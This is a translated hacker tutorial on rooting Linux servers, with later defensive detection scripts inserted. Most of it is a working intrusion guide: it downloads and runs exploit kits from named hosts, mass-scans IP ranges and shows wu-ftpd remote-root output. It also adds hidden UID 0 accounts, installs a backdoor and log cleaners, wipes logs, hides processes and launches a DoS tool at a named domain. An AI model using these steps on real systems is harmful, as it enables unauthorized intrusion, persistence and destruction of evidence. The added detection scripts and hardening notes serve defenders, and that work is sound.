IT ALL BEGINS WITH A DREAM

How to Hack Root on a Server

Tips:
mkdir .bash            <---- creates the .bash directory
cd .bash               <---- enters the .bash directory

mkdir <directory>      <--- creates a new directory

cd <directory>         <--- enters the directory you want

cd /                   <--- leaves the current directory by changing to /

rm -rf <file>          <--- deletes a file/directory

 

1. Stage One

How to install Xpost and ftp
wget http://cyberborneo.b0x.com/xpost.tgz

wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz

tar -zxvf ftp.tgz

 

======================================================

 

2. Stage Two

 

cd xpost
cd xwurm/
./scan 213.124

once you have wu-scan.log
./masswu wu-scan.log

 

After you get a message like the following

Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...

 

That means you have obtained root access on IP 213.124.151.113

 

======================================================

 

3. Stage Three

Open a new session in your PuTTY SSH client and log back in to your shell

go into your ftp directory

 

cd ftp
./awu 213.124.151.113 (the IP)

If you succeed in getting root access, the following message appears:

 

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) 
team teso (thx bnuts, tomas, synnergy.net !). 

# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected. 
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready. 
# successfully selected target from banner 

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 

# 1. filling memory gaps 
# 2. sending bigbuf + fakechunk 
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes 
# 3. triggering free(globlist[1]) 
# 
# exploitation succeeded. sending real shellcode 
# sending setreuid/chroot/execve shellcode 
# spawning shell 
############################################################################ 

uid=0(root) gid=0(root) groups=50(ftp) 
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

 

whoami

root <-- means you currently have root access

 

======================================================

 

4. Stage Four

Add your root-access login
--------------------------------------------------------------

1. Method I (not for Red Hat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<-------- for superuser
 

2. Method II

to get root access, type:

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
after that, type:
passwd crit

wuasu666

 

Then add a user for your shell login

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

 

=======================================================

 

5. Stage Five

Install a backdoor on your new shell to guard against unwanted eventualities


wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup <password you want> <port you want>

example: --> ./setup wuasu 7000
cd /

 

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

 

Do not forget to delete the backdoor files from earlier to erase your tracks

rm -rf  cleaner.tgz

rm -rf  shv4.tar.gz

 

===========================================

 

6. Stage Six

Erase the traces of your rooting by typing the following commands:


rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

 

DONE.....

 

============================================================

 

One tip for destroying a shell of yours that is broken or whose login password has been removed by the admin, provided you are still inside that shell:

 

wget http://cyberborneo.b0x.com/xzibit.tar.gz

tar -zxvf xzibit.tar.gz

cd lamerk
./install

cd /

rm -rf lamerk xzibit.tar.gz

 

============================================================

 

Some good links for exploit programs, DDoS, sniffing, security tools, etc.

 

http://www.angelfire.com/de2/sirex3/linux.html
http://www.megspace.com/internet/wet/linux.html
http://www.s0ftpj.org/en/tools.html
http://web.textfiles.com/hacking/
http://www.honeynet.org/scans/
http://www.honeynet.org/scans/scan15/som/som30.txt
http://www.yolinux.com/TUTORIALS/LinuxSecurityTools.html
http://www.attrition.org/mirror/attrition/2000-07.html/
http://www.sans.org/rr/infowar/hacktivism2.php
http://www.antihackertoolkit.com/tools.html
http://www.hackinglinux.co.uk/
http://www.virtro.de/now_inhalt.html
http://packetstormsecurity.nl/misc.html
http://www.ariska.net/
http://www.valisie.com/Vali/

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

Remedy for tembak.c >> echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Disables packet forwarding
net.ipv4.ip_forward = 0
# Enables source route verification
net.ipv4.conf.all.rp_filter = 1
# Disables automatic defragmentation (needed for masquerading, LVS)
net.ipv4.ip_always_defrag = 1
# Disables the magic-sysrq key
kernel.sysrq = 0
You can get the sample "blockping.tar.gz"; just extract it and move the files to /usr/bin/


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

***Running Tembak.c***

./fake bash ./tembak zipey.net 53 (using the hider, without a root login)

./tembak ipaddress 53 or ./tembak zipey.com 53

./tembak zipey.com 53 -->> means shooting at zipey.com through port 53

(a port 53 that gets shot is sure to go down)

./fake real_process fake_process

./fake httpd ./teso -h 202.202.202.202

./fake -bash ./bnc bnc.conf

./fake pico ./eggdrop -m FroGStoNe

 

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

 

* Fake Background, made by buDZ
Greetz to : fabianclone,EF73 and all #betalmostdone and #antihackerlink

/* [ilang.c] The best file for hiding the background process for Eggdrop and BNC. [http://members.tripod.com/alltoolkit] woRdz: d0n't cHangE beL0w thIs liNe , pRivatE stfU CrEatEd bY buDZ <mYnAmE@bOeDi.NeT> */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>

char fake[1000];

int main(int argc, char **argv)
{
    if (argc < 3) {
        exit(0);
    }
    /* argv[1] is the name to display; it is padded with spaces */
    strcpy(fake, argv[1]);
    strcat(fake,
           " "
           " "
           " ");
    /* run argv[2] with the padded name as its argv[0] */
    execl(argv[2], fake, argv[3], argv[4], argv[5], argv[6], argv[7], argv[8], NULL);
    exit(0);
}



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

***Hide BG process***
gcc -o filename undo1.c
chmod +x filename
./undo httpd ./eggdrop -m eggdrop.conf
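
From the defender's side, the disguise above only changes argv[0]; the kernel still records the real binary in /proc/PID/exe. The script below is an added example, not part of the original page: it compares the two and also flags the space padding that the wrapper appends. The function names, the sample PIDs and paths are constructed, and the plain MISMATCH case generalizes beyond this one tool.

```shell
#!/bin/sh
# Added example (not from the original page). Lists processes whose
# displayed name (argv[0]) does not match the binary actually running.

find_argv0_mismatch() {
    procroot=${1:-/proc}
    for d in "$procroot"/[0-9]*; do
        exe=$(readlink "$d/exe" 2>/dev/null) || continue   # kernel thread / no access
        [ -r "$d/cmdline" ] || continue
        # cmdline is NUL-separated; the first field is argv[0].
        argv0=$(tr '\000' '\n' < "$d/cmdline" | head -n 1)
        [ -n "$argv0" ] || continue
        name=${argv0#-}                      # login shells appear as "-bash"
        trimmed=${name%"${name##*[! ]}"}     # drop trailing spaces
        pid=${d##*/}
        if [ "$name" != "$trimmed" ]; then
            # Space padding is what the wrapper above appends to its fake name.
            echo "PADDED pid=$pid exe=$exe argv0='$argv0'"
        elif [ "${trimmed##*/}" != "${exe##*/}" ]; then
            echo "MISMATCH pid=$pid exe=$exe argv0='$argv0'"
        fi
    done
    return 0
}

# Constructed sample: a fake /proc tree so the check runs anywhere.
# PIDs, paths and arguments are invented for the example.
make_sample_proc() {
    p=$(mktemp -d) || return 1
    add() {  # add PID EXE ARGV...
        mkdir "$p/$1" && ln -s "$2" "$p/$1/exe"
        pid_dir=$p/$1; shift 2
        printf '%s\000' "$@" > "$pid_dir/cmdline"
    }
    add 101 /usr/sbin/httpd  /usr/sbin/httpd -k start
    add 202 /home/u/eggdrop  'httpd   ' -m eggdrop.conf
    add 303 /bin/bash        -bash
    add 404 /home/u/bnc      -bash bnc.conf
    echo "$p"
}

sample=$(make_sample_proc) && find_argv0_mismatch "$sample"
rm -rf "$sample"
```

On a live system, run it as root with no argument and treat the output as a triage list: interpreters and daemons that rewrite their own process title also show up as mismatches.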

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

***Wipe Login User***
(run it while logged in as root)
upload wipe to the user's directory
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

#!/bin/sh

clear

echo "log CLEANING SERVICE - rahul-x"

echo " "

echo "bersih... bersih... "

echo "Removing Files....."

echo " "

rm -f ~root/.bash_history

rm -f /var/log/lastlog

rm -f /var/log/netconf.log

rm -f /var/log/boot.log

rm -f /var/log/messages

rm -f /var/log/secure

rm -f /var/log/xferlog

echo "Creating Files......"

echo " "

touch ~root/.bash_history

touch /var/log/lastlog

touch /var/log/netconf.log

touch /var/log/boot.log

touch /var/log/messages

touch /var/log/secure

touch /var/log/xferlog

echo "Change Mode Files..."

echo " "

chmod 0664 ~root/.bash_history

chmod 0664 /var/log/lastlog

chmod 0664 /var/log/netconf.log

chmod 0664 /var/log/boot.log

chmod 0664 /var/log/messages

chmod 0664 /var/log/secure

chmod 0664 /var/log/xferlog

echo " "

echo "riped riped riped by rahul-x : ... "

echo " viva indonesia "

echo " "
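
The wiping steps in Stage Six and the cleaner script above leave recognizable artifacts on disk: history files replaced by symlinks to /dev/null, and logs re-created empty with mode 0664. The check below is an added example, not part of the original page; the function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): flag the artifacts that the
# log-wiping steps above leave on disk. An optional prefix lets it run
# against a mounted disk image instead of the live system.

check_log_tamper() {
    root=${1:-}
    # History files replaced by a symlink (the page links them to /dev/null).
    for h in "$root/.bash_history" "$root/root/.bash_history"; do
        [ -L "$h" ] && echo "SYMLINK $h -> $(readlink "$h")"
    done
    # Logs that were deleted and re-created: zero length, and group-writable
    # because the cleaner script resets them to mode 0664.
    for f in lastlog messages secure xferlog boot.log netconf.log; do
        p="$root/var/log/$f"
        [ -f "$p" ] || continue          # not every host has every log
        [ -s "$p" ] || echo "EMPTY $p"
        case $(ls -ld "$p") in
            ?????w*) echo "GROUP-WRITABLE $p" ;;
        esac
    done
    return 0
}

# Constructed sample: a tiny filesystem tree in the state the page's
# commands would leave behind, plus one untouched log for contrast.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/root" "$t/var/log"
    ln -s /dev/null "$t/root/.bash_history"
    : > "$t/var/log/messages"; chmod 0664 "$t/var/log/messages"
    : > "$t/var/log/lastlog";  chmod 0600 "$t/var/log/lastlog"
    echo "Jan  1 00:00:01 host sshd[1]: constructed line" > "$t/var/log/secure"
    chmod 0600 "$t/var/log/secure"
    echo "$t"
}

tree=$(make_sample_tree) && check_log_tamper "$tree"
rm -rf "$tree"
```

An empty log right after rotation is normal, so correlate each hit with the rotation schedule and with copies held on a remote syslog host.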

 

Closing the Samba hole against the sambal.c attack

To deal with it, there is one very easy technique: edit the smb.conf file. You only need to find this section:

----------------
[netlogon]
comment = Network Logon Service
path = /usr/local/samba/lib/netlogon
guest ok = yes
writable = no
share modes = no
----------------

Then change guest ok = yes to guest ok = no. Next, stop Samba with the command /etc/init.d/smb stop to deactivate the running Samba configuration. Then start it again with the command /etc/init.d/smb start to run the new configuration. With that change made, try the exploit again.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

cat /etc/passwd
copy-paste it into Notepad
look for entries ending in bash <<= these can be made root
then look at the numeric part => :x::255::255: and change the middle one to 0
then remember which user it was that you changed to 0
cat > /etc/passwd
press Enter, paste it back, then press Control-D, then press Control-C
check whether it worked, whether the 255 changed to 0
passwd user <<= recall the name of the user whose 255 you changed to 0
then once you have logged in and run su, go straight to cd /lib/security
create a directory pam_res.so
cd pam_res.so
wget the cleaner there
inside pam_res.so nothing other than root is allowed; you have to change the user name to root

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

openBSD:
wget http://packetstorm.decepticons.org/crypt/ssh/openssh/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.4p1.tar.gz
wget www.renjana.com/sshutup-theo.tar.gz
tar -zxvf sshutup-theo.tar.gz
ls -al sshutuptheo
cd openssh-3.4p1
patch < ssh.diff
./configure
make ssh
./ssh -l root IP
e.g.: ./ssh -l root shah.koptevo.net
http://www.netcraft.com/whats/?host=www.t-mems.com.tw

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Rooting SSH on LINUX, port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port
e.g.: ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- mass SSH scan
./r00t 203.20 -d 2 <--- mass FTP scan
./r00t 203.20 -d 3 <--- mass FTP scan
./r00t 134.7. -d 4

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Rooting with massaphace:
./massossl 200 443 160 means scan IP 200.160 on port 443. Do not change port 443; only the IP may vary, from 1 - 254, except that 192.x.x.x and 10.x.x.x IPs cannot be scanned, because they are intranet IPs.
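
Both account-tampering passages on this page (the useradd ... -u 0 commands in Stage Four and the /etc/passwd edit above) leave entries an administrator can audit for. The script below is an added example, not part of the original page: it reports extra UID 0 accounts, login accounts homed under /etc, and accounts with an empty password field. The function names are constructed; the sample uses the account names from this page with invented values for every other field.

```shell
#!/bin/sh
# Added example (not from the original page): audit account files for the
# changes described above. Pass alternate paths to check a disk image,
# or "-" to read from standard input.

audit_passwd() {
    awk -F: '
        # Any account other than root with UID 0 is a second superuser.
        $1 != "root" && $3 ~ /^0+$/ { print "UID0 " $1 }
        # Login-shell accounts whose home directory sits under /etc,
        # as in the useradd -d /etc/... commands on this page.
        $6 ~ /^\/etc(\/|$)/ && $7 ~ /sh$/ { print "HOME-IN-ETC " $1 " " $6 }
    ' "${1:-/etc/passwd}"
}

audit_shadow() {
    # An empty second field means no password is required (passwd -d).
    awk -F: '$2 == "" { print "EMPTY-PASSWORD " $1 }' "${1:-/etc/shadow}"
}

# Constructed sample data: account names are the ones used on this page,
# every other field is invented for the example.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
rampok:x:0:0::/:/bin/bash
crit:x:0:0::/etc/crit:/bin/bash
html:x:502:10::/etc/html:/bin/bash
EOF
}
sample_shadow() {
    cat <<'EOF'
root:$1$constructed$notarealhash:11800:0:99999:7:::
rampok::11800:0:99999:7:::
html:$1$constructed$notarealhash:11800:0:99999:7:::
EOF
}

sample_passwd | audit_passwd -
sample_shadow | audit_shadow -
```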
